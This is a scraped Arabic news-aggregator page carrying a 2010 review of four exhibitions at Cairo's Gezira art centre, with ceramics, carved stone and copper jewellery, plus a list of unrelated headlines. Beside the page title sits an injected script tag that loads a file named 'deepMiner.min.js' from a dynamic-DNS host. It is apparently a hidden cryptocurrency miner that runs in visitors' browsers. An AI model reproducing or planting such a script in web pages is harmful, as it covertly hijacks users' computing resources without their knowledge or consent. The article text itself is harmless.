googletag.defineSlot('/21620968445/Masress_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-1446553049-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_1', 'div-gpt-ad-1446553049-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553047-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_3', 'div-gpt-ad-1446553047-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1446553048-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Article_2', 'div-gpt-ad-1446553048-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Widget', [[222, 280]], 'div-gpt-ad-374346843-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Widget', 'div-gpt-ad-374346843-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Masress_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1775746800-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Masress_Ar_Siteunder', 'div-gpt-ad-1775746800-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); مصرس : لقاء الحضارة والتاريخ في مركز الجزيرة<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
رئيس جامعة أسيوط يتفقد الجولة الأخيرة في انتخابات اتحاد الطلاب    ألبومات ذات صلة    وزير الاستثمار: الرئيس السيسي وجه بالاهتمام برواد الأعمال    الملا من شرم الشيخ: مصر تولى اهتمامًا كبيرًا بتطوير قطاع الطاقة والتعدين    وزير المالية ل«الشروق»: الالتزام بالبرامج البيئية شرط توفير التمويل للمشروعات    بروتوكول بين الأوقاف والتموين لتوزيع 250 طن سلع غذائية على الفقراء    وزارة التموين: الانتهاء من وضع معايير الاستحقاق الدعم التمويني بنهاية الشهر الجاري    مدرب بمركز إعداد القادة: حريصون على إعداد كوادر شابة تدير المنظومة الكهربائية    عشراوي: يجب العمل ضمن تحرك عالمي لمواجهة النظم الشعبوية والعنصرية والاستبدادية    نتائج تحقيقات النيابة العامة السعودية فى قضية مقتل خاشقجى فى 17 معلومة    الخبر التالى:    شاهد.. لقطات مرعبة لجحيم كاليفورنيا بعد وصوله للطرق السريعة    محاضرة فيديو للاعبي منتخب مصر استعدادا لمباراة تونس    الخطوط الكويتية: استئناف الرحلات الجوية بمطار الكويت الدولى    أخبار قد تهمك    وكيل أمن الدولة السابق: إطلاق اسم الشهيد ساطع على ميدن النهضة أثلج صدور المصريين    كاميرات المراقبة تكشف عاطل وراء سرقة 9 شاشات من محل بلاى استيشن فى الزيتون    ضبط 11 مخالفة تموينية في حملة بمطروح    ضبط امرأة هاربة من تنفيذ 42 سنة سجن بالبحيرة    قيمتها الإجمالية مليون ريال: السعودية تُطلق جائزة عالمية للشعر العربي تحمل اسم الأمير عبدالله الفيصل    شاهد.. صور تجمع ماجدة الرومى ويسرا وإلهام شاهين وكارول سماحة    شاهد.. لقاء سويدان برفقة داليا مصطفى من كواليس "البيت الكبير 2"    محافظ أسوان يهنئ الدكتور مجدي يعقوب بمناسبة عيد ميلاده    أسهم أوروبا ترتفع مع صعود شركات التعدين وسط آمال بشأن التجارة    قنبلة بوزارة الخارجية تدفع إسرائيل لإعلان الطوارئ    الجمهوريون ينتخبون كيفن ماكارثي زعيما للأقلية في الكونجرس    الخبر التالى:    «الأرصاد»: درجات الحرارة أقل من معدلاتها.. وتعود لطبيعتها بدءًا من الأسبوع المقبل    ضبط 11 عنصرا إجراميا و 3 قضايا مخدرات بحملة أمنية بالعبور    أسرار ومفاجآت وراء قرار وليد سليمان باعتزال اللعب دوليا    بطل بروندي يحدد موعد مواجهة الإسماعيلي بدوري الأبطال    غدا.. وزير الأوقاف يلتقي قيادات الدعوة بالدقهلية    سيل يضرب وادي الرحبة في جنوب سيناء ويغلق طريق سانت كاترين    30 يونيو.. الانتهاء من الأعمال الإنشائية بمستشفى جهينة المركزي    محافظ الأقصر يلتقى وفد مشروع إعادة اكتشاف الأصول التراثية لإسنا    مكتبة مصر الجديدة تظهر بإطلالة جديدة في عيد ميلادها ال 73    ميندي لاعب سيتي يخضع لجراحة في الركبة    إغلاق الأكاديمية الدولية للتعليم بسبب العمل بدون ترخيص    بالصور.. انطلاق المؤتمر الدولي الأول للجراحات الوظيفية للجهاز العصبي لجامعة الأزهر    متحف النسيج ينظم احتفالية بمناسبة المولد النبوي الشريف واليوم العالمي للطفولة    رئيس كوريا الجنوبية: التحالف بين سول وواشنطن يقود بيونج يانج إلى طاولة الحوار    علي معلول ومحمد نجيب يواصلان التأهيل في الأهلي    أخبار قد تهمك    «أوراسكوم للاستثمار» تضاعف أرباحها 3.5 مرة خلال 9 شهور    خالد سرحان يواصل تصوير مشاهده فى "قيد عائلى"    فيديو| الإفتاء تطالب بتجاهل فتاوى المتشددين في الاحتفال بالمولد النبوي    " جروس" يصل القاهرة اليوم ليستكمل تدريبات الزمالك    الزمالك يقترب من خطف نجم الأهلي    أنباء عن وقف التحالف العربي عملياته في الحديدة    تناول 4 فناجين قهوة يومياً يقى من مرض السكر    شاهد.. الكلية الفنية العسكرية تحصد جائزتين    دراسة: البشر أفضل في تذكر الأسماء عن الوجوه    بيع قلادة ماري أنطوانيت ب36 مليون دولار في مزاد بجنيف    وزير الشباب في نادي الزمالك للتمهيد لزيارة رئيس الوزراء    تعالوا نبدأ بأنفسنا    بوضوح    كلام بحب    .. والسلام ختام    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





لقاء الحضارة والتاريخ في مركز الجزيرة
نشر في القاهرة يوم 09 - 03 - 2010

افتتح مركز الجزيرة للفنون 4 معارض لأربعة فنانين اختلفت وسائلهم الفنية من حيث الخامة والتناول فالخزاف محمد مندور استخدم لغة الطين والنحات سعيد بدر لغة الحجر والفنانة الصاعدة ماجدة علي لغة النحاس المؤكسد في عالم الحلي والمعرض الرابع لنهي عمر الذي لم يحمل أي دلالة سوي ملء فراغ القاعة.
وقد حضر حفل الافتتاح لفيف من رجال الصحافة والإعلام والمهتمين بمتابعة الفنون التشكيلية ومن خلال تجوالي في المعرض للمرة الثانية شعرت بغياب لوحة التصوير والألوان وأدركت مدي تأثيرهما في المشهد التشكيلي البصري الذي يلعب دورًا مهمًا في تنوع طرق الرؤية عند المتلقي من خلال تعدد القيم الجمالية والتي ستدركها بمجرد النظر لأعمال الفنان عاشق الطين محمد مندور وهو من أبرز الفنانين المعاصرين وهو من مواليد 1950 بالقرب من فواخير الفسطاط فكان يري الطين وهو يتحول إلي قطع فنية بواسطة الدولاب الدوار علي يد الخزاف البسيط الذي اعتقد أنه ساحر، فساعدته نشأته إلي جانب موهبته في التمكن من التعامل مع «الدولاب» الذي أصبح طوع بنانه يتحرك كيفما يشاء ليبث من خلاله روحًا جديدة للعالم ولم يكتف مندور بالمشاهدة فقط فقد التحق بأتيليه حلوان الذي أقامه النحات محمد حسين هجرس والمصورة صفية حلمي لتتسع دائرة المعرفة لديه وآفاق التفكير المطلوبة لإثراء عملية الخلق وقد جمع بين وحدة التصميم وبراعة التنفيذ لتأكيد رؤيته الخاصة بينما معظم الخزافين الأكاديميين لا توجد علاقة ألفة بينهم وبين الدولاب الدوار. الأمر الذي يجعلهم في الأغلب الأعم يعهدون بتصميماتهم إلي حرفيين يقومون بتنفيذها وقد اشتملت أعمال مندور علي الآنية بأحجام مختلفة وكذلك اختلفت التقنية ما بين ملمس السطوح الخشنة وملمس السطح الناعم وكانت الأعمال كثيرة بحيث ضاقت مساحة الرؤية بالإضافة إلي الأطباق المرسومة التي اشتهر بها وميزته وهي أطباق مطلية بأكسيد أبيض ومرسوم عليها بالأكسيد الأسود ويقوم بعملية الحرق في كل مرة لتثبيت الأكسيد وهذا هو سر مندور وتلك هي معادلته الصعبة فبرغم أنه ليس خريج كليات الفنون التطبيقية والجميلة أو أي معهد أكاديمي إلا أن خزفياته تحمل كل القوانين والشروط الجمالية المنصوص عليها في الأدبيات الأكاديمية ممزوجة بروح تلقائية.
الفنان سعيد بدر مواليد 1965 كفر الشيخ خريج كلية الفنون الجميلة جامعة الإسكندرية ويعمل مدرسًا بقسم النحت وشارك في أكثر من 12 سمبوزيوم دوليًا وشارك أيضًا في معارض ومهرجانات جماعية وحصل علي عدة جوائز بإيطاليا وإسبانيا وأقام خمسة معارض خاصة من بينها معرض بالأكاديمية المصرية للفنون بروما 1998.
وبنظرة متأنية علي أعمال سعيد بدر التي ازدخرت بها القاعة فهذه الأعمال تحتاج لقاعات واسعة لأهمية الفراغ بالنسبة لحجم الكتلة نري كتلة من الحجر الأسود منقوش عليها كتابات مرئية غير مفهومة لأنها بلغات مختلفة من لاتينية وهيروغليفية، ومسمارية وقد استلهم الفنان أعماله من «حجر رشيد» وما يحمله من طلاسم قام العلماء بفكها لتزود القارئ بمفاهيم جديدة وحجر سعيد باللون الأسود يحمل رسالته من عدة ثقافات مختلفة وأحيانًا يكتب أحرف لا تعبر عن منطوق حقيقي للكلمة بل مجرد حروف حفرها بآلة رفيعة حادة ليحصل علي تلك المساحات الضيقة والعميقة البيضاء للخطوط المتزاحمة والسطور الكثيرة ومن خلال عملية الحفر يحصل علي لون الحجر الأصلي وهو الأبيض لتظهر لغة الكتابة بالأبيض علي الأسود وأحيانًا يستخدم لون الحجر الرمادي.
وأعمال سعيد تستقر علي القواعد البيضاء الخشبية لتسمو بالمشاهد بحالة من الصوفية تدفع بالروح لتهيم خارج الجسد وتحمل أبعادًا هندسية تؤكد علي رؤيته الروحانية الخاصة المرتبطة بذكري التاريخ واستدعائه من خلال خلق زوايا متباعدة أحيانًا ومتصلة أحيانًا أخري تنطوي علي إيقاعات خطية من خلال حالة اتزان ناشئة من تلك التقاطعات السريعة والتي تستقر عند نقطة معينة لتخلق زاوية حادة أو منفرجة لترسم إيقاعًا موسيقيًا يوحي بالحركة فيعطي ثراء لبعض الأشكال التي تبدو صماء وجافة أحيانًا.
والمعرض الثالث لمصممة الحلي المتألقة ماجدة علي وهي حاصلة علي بكالوريوس تجارة 1985 والذي لم يمثل مانعًا لهوايتها المحببة في فن الحلي والإكسسوار وقد شاركت في عدة معارض جماعية في معرض اليوم الواحد بساقية الصاوي وقاعة دروب وقاعة خان المغربي (في البرواز) 2009 ونظرًا لأن إنتاج الحلي يستغرق مجهودًا مرورًا بعدة إجراءات حتي تتم عملية التنفيذ لما تحتاجه من دقة في التركيب والتوليف والإخراج فإن فناني الحلي يعرضون أعمالهم في فترات متباعدة وفن الحلي من الفنون المصرية القديمة حيث كان يرتديها المصريون القدماء ليس لمجرد الزينة إنما بغرض الحماية ودفع الشر لذلك كانت تصنع علي هيئة الأشكال المقدسة وكان لألوان الحجر كالفيروز والزمرد دلالات رمزية مرتبطة بالروح وفي العصر الإسلامي ارتبط فن الحلي بالزينة خاصة الزخارف الإسلامية حرصًا علي إثرائها بالقيم الجمالية للفن الإسلامي من خلال التجريد في العناصر الطبيعية والآيات القرآنية والخط العربي وأعمال ماجدة مزجت بأسلوب فني معاصر بين روح التراث المصري القديم والروح الإسلامية حيث قامت بعمل توليفات ناجحة من الأحجار الملونة بكثافة داخل الخطوط النحاسية الرفيعة أو من خلال ثقب يتدلي منه قطع نحاسية صغيرة تأخذ شكلاً دائريًا بحجم المليم ينعكس علي سطحها الأضواء الساقطة علي الأحجار الملونة ذات الأسطح الملساء والتي تزيد انعكاساتها مع كثرة اهتزازها بفعل حركة التنفس وأثناء السير بدلال.


انقر هنا لقراءة الخبر من مصدره.